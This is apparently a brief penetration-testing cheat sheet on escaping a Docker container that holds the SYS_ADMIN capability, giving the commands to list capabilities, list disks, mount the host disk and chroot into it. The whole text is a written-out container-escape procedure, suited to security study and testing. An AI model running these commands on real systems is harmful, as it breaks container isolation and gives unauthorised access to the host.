Docker - Escalation of privileges - Capabilities
- Escalation
Inside a container, list the capabilities:
capsh --print
Check the possible rights :
Example: SYS_ADMIN
List of capabilities: https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
With the SYS_ADMIN (Perform a range of system administration operations.) capability, it is possible to mount disks (among others).
List the disks:
fdisk -l
Mount the disk:
mount /dev/sda /mnt/
Container evasion:
chroot /mnt bash